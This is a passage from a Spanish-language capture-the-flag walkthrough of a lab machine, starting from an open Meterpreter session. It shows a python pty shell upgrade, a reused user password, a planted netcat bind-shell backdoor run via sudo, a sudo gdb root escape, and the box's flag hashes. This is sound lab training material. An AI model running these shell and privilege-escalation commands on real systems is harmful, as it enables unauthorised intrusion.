[*] Meterpreter session 1 opened (192.168.1.57:7777 -> 192.168.1.98:47814) at 2020-08-01 19:05:39 +0200
Ya tenemos un meterpreter
msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 1573 created.
Channel 0 created.
Si ponemos
whoami
www-data
Intentamos loguearnos como root
su
su: must be run from a terminal
Tenemos que abrir una terminal
Ponemos
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@aqua:/etc/samba$
Lo que hemos hecho es ejecutar python3 y hacemos que ejecute vía comandos las siguientes instrucciones:
- importar pty. tty es la terminal de linux. El shell es otra cosa, es la línea de comandos. Bueno, pues el pty es una pseudo-terminal (pseudo-tty).
- abrimos (spawn en inglés significa aparecer) /bin/bash).
De esa manera, ya tenemos una pseudoterminal.
Probamos
www-data@aqua:/etc/samba$ su megumin
su megumin
Password: watashiwamegumin
megumin@aqua:/etc/samba$
ya somos el usuario megumin.
Si nos vamos a /home/aqua/Desktop
nos encontramos
megumin@aqua:/home/aqua/Desktop$ ls
ls
backdoor sourcecode user.txt
cat backdoor
#!/bin/bash
echo "[+] Backdoor opened! Hehehe..."
runuser -l aqua -c 'nc -lvnp 1337 -e /bin/sh' &>/dev/null
Parece que tenemos un backdoor
runuser permite ejecutar un comando como si fuese un usuario concreto
Y si ponemos
cat user.txt
Congratulations!
((/
,(##########((
(###############((#(//
#####(#/,(###########(###(.
,####(#,/,(########((#####(###(/
#####(,##(#(###(#(#/,,,,,(,,#,,,/
((##(###(#(#(*,/,,(*,,,(#/(,**,,/(/*/
(#####%(##(((*#(,,,(,,,,/((%############.
###%%##%%(#/,/*,,,/(#(#(#(####################(.
/,* ((,,((#(###(########(/,,,,*/*,,,,(########(
,,,,/ (,,,(##########(,,,*((%%%%,%%%%%%%%#(*,,(#######/
***/ ((#(######(,,*(%%,#%%%%%%%%.%%%%%%%%(%#%#(#(((/,,/(((,
######(,,/#%(%%%#..%/%%%%%%#.#%%(%%%%#%(############(,
,#####(,,(%%%%%%%((*...#(######( (####(#(%%(%#(/.
*#####,,(%%%%%%%%(//# ,, /(/######/*###(#(##(
,####(,/(%%%%%%%%#(. /(. .* /(((//*(#(###/
(###(,(%(%%%%%%####( / ,((( *(( ((,#%##((
/###(,(#%#%#%%#,###### . ((((,/ .,(/(* .#(#(#
(##,*#%#%%##%#(( ####### (*,,* . . (#(*
/(,/##########(#(#((##(##.* ,. ,***/ (#(
/###((((((/. #(##(#####. .,... /.///////(( ((,
(##(##(#/. /////////// #%#
#(###((#.. (////////( /#%%((.
, (###%((%%%%,( .//(/. /(%%%#(#
.#%##((%%%/,*%%##%%(/%*/%%%%(/ (,(.*
.(#%((%/,(,(*/, ./#%(*##%#( #(((/(****/
Now, there are two ways to get root. I'll let you choose. If you managed to get both, that's gonna be AWESOME to hear! Good luck!
404CDD7BC109C432F8CC2443B45BCFE95980F5107215C645236E577929AC3E52
megumin@aqua:/home/aqua/Desktop$
Vale, nos dice que ya tenemos dos maneras para ser root.
Por cierto, el directorio download es un enlace a github.
Usando hash-identifier, vemos que el hash es sha-256
Bueno, si ponemos
megumin@aqua:/home/aqua/Desktop$ sudo /home/aqua/Desktop/backdoor
sudo /home/aqua/Desktop/backdoor
[+] Backdoor opened! Hehehe...
Abrimos otra consola y ponemos
root@kali:~# nc 192.168.1.98 1337
Se queda a la espera.
Volvemos a poner
python -c 'import pty;pty.spawn("/bin/bash")'
Y nos sale
root@kali:~# nc 192.168.1.98 1337
python -c 'import pty;pty.spawn("/bin/bash")'
aqua@aqua:~$
sudo y su otorgan privilegios, la diferencia está es que, con su, podemos ser root en la misma sesión, y por tanto, pide la contraseña de root. En cambio, con sudo, no dejamos de ser el usuario concreto, pero sí que el sistema nos concede algunos de los privilegios de root.
Veamos qué privilegios tiene aqua
sudo -l
Matching Defaults entries for aqua on aqua:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User aqua may run the following commands on aqua:
(ALL) NOPASSWD: /root/quotes
(ALL) NOPASSWD: /root/esp
(ALL) NOPASSWD: /usr/bin/gdb
aqua@aqua:~$
Si nos vamos a https://www.hacknos.com/gdb-debugger-privilege-escalation/ nos explica cómo escalar privilegios con gdb
Ponemos
aqua@aqua:~$ sudo gdb -nx -exec '!bash'
sudo gdb -nx -exec '!bash'
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word".
!bash: No such file or directory.
(gdb) !bash
!bash
root@aqua:~#
Y ya somos root
cd /root/
root@aqua:/root# ls
ls
esp quotes root.txt
root@aqua:/root# cat root.txt
cat root.txt
Congratulations on getting the root shell!
Try to get root on two ways! [If you have more, well, you're the master then.. :> ]
Need some hint on the harder way of getting root? Decode this : RG8gbm90IHVzZSAvdXNyL3NoYXJlL2dkYiBpbiB0aGUgc3Vkb2VycyBmaWxl
Or if you don't want any hint, simply don't decode it. XD
You like the box? or not? Hit me up on Twitter @yunaranyancat ;)
.. ((((##,
,,..*/(/(##%%%%#/*. ##(##.
.,..**.,*////((########%%%( ,%#(
,..,(*(((///((((((((#######%%%%##/,,..
,.,(#(//////(((((####((####%%%%###%%#####(///*
..*(#/***////((##(///(#(//(#%((((((%%%%%%#######*/,
..,##*,,***//((////(#((((((%#**/(((%#((#(#%%%########**.
,./#/,,,,**//***//(((((((#%%(((((##(*/((#(((%#%#########**,
.,(#*,,,,*..,**/////((##(%#(((((#((((((((#(((#%##%##########*,
,.(#*.,,,....,*/**///////#(((((((((((((((((((((#%##%##########(*.
,,,*#*,,..,,,,,*,***,,***/(//(//(((((((((((#(((((##%###############(
,.,,,(*,,.,,,,,*,*,,,***,,#///*,.,//(((((((((((((((#(###(#%###########(
.. .*,*#*,,,,,,*,*,*,*,,*(#(//*,...*///////(((*/(((((#((###((#%##########%,
. ,#,,(%******/*******,*##*//*,**,,,*////////,*//((((#(((###(##%##########%*
, *%/**((****#(*******/##,*(*/********,.,,,*/..,*/////((/*##(####%##########%.
, /##*/*(#///#(////**/##/,*////*********, .*,..,,,*////(//*(#(#####%###########.
. .*#/#/#//#(/#(///(####(***///#/*********,,*,******///*,,,,,,#((######%##########.
, .*#//((##(((#(/////##%%////(/(#/*************/*******////,...#((((#(#(###########(
..,*(/**/(((####(///(#**//(/////##(////***(#**%(*/************,./(((((#(((%#########%*
,,*((/*/(#/((#((////****/(///(/(###(((//##//(#(//*/////********,*(((((##(((#%#########
*/(#///(#//(####&@/*,,*/((//(#/(###((#%%#(****///(//(///////****,#//((((#(((#%#######%
./(%#(/(#(//(#(**#&@*,*/((///((/(#((###/,,//**/(/#///(///////****,#(///(((#(((#########
/(#%#(#%%(//*/.,&&&&@/**///*(#///#(,,,,,,,.../((#((((((((((((/***,##//////(((((########
*(##%##%%%(/*,* .%%&&*,*//*/##/*//,,,,. .*#(((((#(((((((#////*%##//////#(((###(((((
*#**(%#%%(((/. . #//%&/*.****(,.****.,.. .,*/(//((#(((((((#(////%##(/////(#(((###((((
.,/. ,(%%(#(/#/. (*..* . ****, ,***,,,*... ..*,///(##((((((##((//(%###//////(((((%##(((
.*,. *%(//((, . ,/*, .***. .**,(%%&@@#....*///#(((((((##(((/#%%##(//((((#((((###(#
,*. *(//&* .. .,* .../&&&&&&( **//((((((####((((%%%###(((((((#(((#####
*(%&%( . ./&&&&&&&&**//((((((#(#((((%%%%###(((((((((/((###(
(/&&%/ ##/#&%&&&&&&/(((((((##(#(((#%%%%###((((((((((/(%##(
,(&%%%# .%*,/(&&%&&&%///((((#(((#((/&%%%%#(##(((/(((((//##((
.... *#%%%%%, .#*...,/%&((##*/(((#(((#((((&%%%%#((#((((((/(((/(#(/
.,. ... .#%%%%%( ,//*... ,,((##((((#(((&&%%%%#((##(((((((((/(#/*
.. . ... *%%%%&%, *(*, ,*#((((((##(/(, /%%%##((#(((((((((/(#/*
. . . .. .#/#%%%%# ,*,..,,. ..,//(((((((#(#((/*.#%%%(#((((((((((/(((#/*
. . . . *(///%%%%/ ,......,. ..,,,,,**/////(((###(((((,*,%%%%(((((/((((#//((((/*
. . . .,/#//#//(## .......,. .*****/((##%%#((#((*..(%%%%((#((((#(((//(((/(*
. . ,/((/(#/(#(#* .*,#(##%#((((#((*.,&%%%%((#((((((((//(#//((
. . .#%#/#//&%(/%, ,*/(#(#&%(######((%&&&%%%%(/#((((#(#(((#((//(
. . *%/((/#%/%# .*/***#(#&%##(#####(&&%&%%%%%(/(#((((###((/(((((
. .. ,. *.(((&%%(&%%%%#(//**............,,,,,****((#%%%######(%(&&&%%%%%%(/(#(((((###%#(((##
. .. ., .*#/%%%%/#&%%%######%.........,,,,,,,,,*(#(##%%######(%(&&&%%%%%%#/(##(/(((%###%((##
. .. , *%(/#&&%,&((&%%&%%%%%%*.......,,,,**,,,,((((%##%/(####(%%@@@&%&%%%%/(###((((##%##%%##
. %%((/((/&&%(%%%&%%%%%%,.....,*,.,,,,//(#(#%%###//((##(%&@@@@%&%%%%((##%#((((###%###%
/%%(((//////(##%%&%%%((//*...,,**,,,(####%%###((///***#&@@@&@&&%&%(/##(#(########%#(
,%%%#((//((#%%%%%#%#(*.......,,*((((##%#(%%((#(#((((/*#&@@@@@@&&%%#/##((#(#########%
,##%#%((%%%%%%%%%&@@(*,..,//#######(%%#%%(##(((#((((#&%%&&@@&%%((##(%#(####(#(((
*#%%#/, /%&@&&&@&%(/(///(((#(####%%#(##((((((((%&&%%%%%%##%%#(##(%%#///((((((
. ... ./%%%###%####%&%((//##%(#%##%%%##&((###(((((((#%%%%%###%%%(##(%%%%/((((///
.. ./#%%#%###%%####&&(#%##%######%%####&((###(((#((((##%#####%%&((#(%%%%#((((//*
.... %&&@#(%###%%#########%##%##%%%#####%#/#####((#(((%%%######%&@@#(##%%%#%%((/(/*
... #&&&&(#%##%%%##%&%###%#(#%#%%#######%&*####(#((#(((########&@@@&((#%%%##%%#///(
.. .%&%&&%%#%%%#%%%####%(##%%%&%#####%%%%%&/####((#(((((%#####%@@@&%&%/##%%%###%#***
. ,%#%&&&%%%&%%%%%####%(#%&&%%%&%%%%%%%%%%&%/####((#(((((#%#%%&&#%%&((#%%%######/*
. .*(%%&&&&&&%&&%&&%%####%((#&&&&%%%%@&%%%%%%%&&&(/(###/(##(((((#####%%%%((((##%%%#######
.(#%%%&&&&&&&%%%&%##%%&(##&&&&&%%%%&@@@@&&&&&&&&(/(###/####(/((((#########%(#(%%%######
. ,(###%%%&&&&&&&&&%#. ./&%(#%&&&&&&%%%#%&%&&&&&&%%%%%%(####/#%%###########%%%#&%(#(#%%#####
..,..*(####%%%%&&&&&&&&&&*,,(#%##(#%&@&&&&&%%###%&&%&&&%%%%%%%%%%%%(/(####%%%%%&&&&&&&&&%(#((%%####
.,*(((#####%%%%&&&&,,,.,.......(##%&&&&&&&&%#####&&&&%%%%%%%%%%%%%%%(//#%%%%%%%%%%%&&&&&&%((/(/#%##
/(((((#####%%%&&&%,.,**,,,/#(((##%&&&%&&&&&####&&&%%%%%%%%%%%%#%%%%(//(#%%#%%%%%%%#%%&&&&((//(/(%
((((((#####&&&&&%%%&&(..*#@(/((#%&&%%%%%%%%&(((%&%%%%%%%%%%%%%%%%%%%(////(%%%%%%%%%%#%%#%%#((/(//
/(((**,*##&@&&&%%&%%/../(#@,((##&&&%%%%%%%%%(((%%%%%%%%%%%%%#%%%%%%%%(//////(%%%%%%%%(//#%%%((//(
........(##@@&&((.../(/%&/(%#&&&%%%%%%%%%%%&(((#%%%%%%%%%%%%%%%%%%#%%%%(//////////////#&&&%%%##%#
.......,#((*/&(#*,,/#/*&&(%%#&&&%%%%%%%%%%%%%((%%%%%%%%%%%%%%%%%%#%%#%%%%///////////(&&&%%%%%####
......./((///%#%%/,,*#(,/&%%%%&%%%%%%%%%%%%%%/(%%%%%%%%%%%%%%%%%%###%%%%%%%%%#(##%&%%%%%#%%%%%%##
.......(,**#%%%####%%(,*(&&%%%%%&%#%%%%%##%%%%%/(%%%%%%%%%%%%%%%%%%%%%%%%%#%%%%%%%%%%%%%%%%##%%%%##
....,*...#%%%#((####(,,,/&&%%%%%%%#%%%%%%%%%%%%(%%%%%%%%%%%%%%%%%%%%%%%%%%%#%%%%%%%%%%%%#########%%
..,*.,./%&%((((##(((,.,./&&%%%%%%&%%%%%%%%%%%%%#&%%%%%%%%%%%%%%%&%%%%%%%%%%%%%%%%%#%%%%%(((########
%(.*..#&%(((((#(/((. .,.(&&%%%%%%%%%%%%%%%%%%#%%%%%%%%%%%%%%%%#&%%%%%%%%%%#%%%#%%%%%%%%(/#* ,(#####
,,*.*%&(((((((//(((..*.,&%&%%%%%%##(#%%#%%%%%%%%%&%%%%%%%%%%%#%%%%%#%%%%%%%%%%%%%%%%%%#/#** *(#(
/,,#%%(((((/////((/,*,.%%%&%%#%%#%##%%%%#%%%%%%%%%%&%%%%%%%%%#&%%%%%%%%%%%%%%%%%%%#%%#(##&/
,,/%#((((/((////((,**,,&%%&%#%%%#%%%%%%%%%%%%%%%%%%%%&&&%%%%%&&%%%%%%%%%%%%%%%%%%%%%##%#%&&
%/%&%((///////(/(*,*,,(#%%%#%%%%%%%%%%%%%%%%%%%%%%&&&&&&&&&&&&%%%%%%%%%%%%%%%%%%%%%%%%%%%(
(%%%######((///((,,*,,%#%%%%%%%%%%%%%%%%%%%%%%%%%%&&&&&&&&&&&&%%%%%%%%%%%%%%%%#%%%%%%%%%%%(
%%%####((/*(#####/**,/&#%%%%%%%%%%%%%%%%%%%%%%%%#&&&&&&&&&&&&&@&%%%%%%%%%%%%%%#%%%%%%%%%%%%/.
%%#####((((#%%%%%%%%%%&(%%%%%%%%%%%%%%%%%%%%%%%%%&%%&&&&&&&&&&&&&%%%%%%%%%%%%%%&%%%%%%%%%#/
&%%#(((####%%%%%%&&%%&&%%(%%%%%%%%%%%%%%%%%%%%%%%#%%%%%&&&&&&&&&&&&&%%%%%%%%%%%%&&%%%%%%%%%%%%#/
CCD758E72A8A8CB5F140BAB26837F363908550F2558ED86D229EC9016FED49B9
root@aqua:/root#
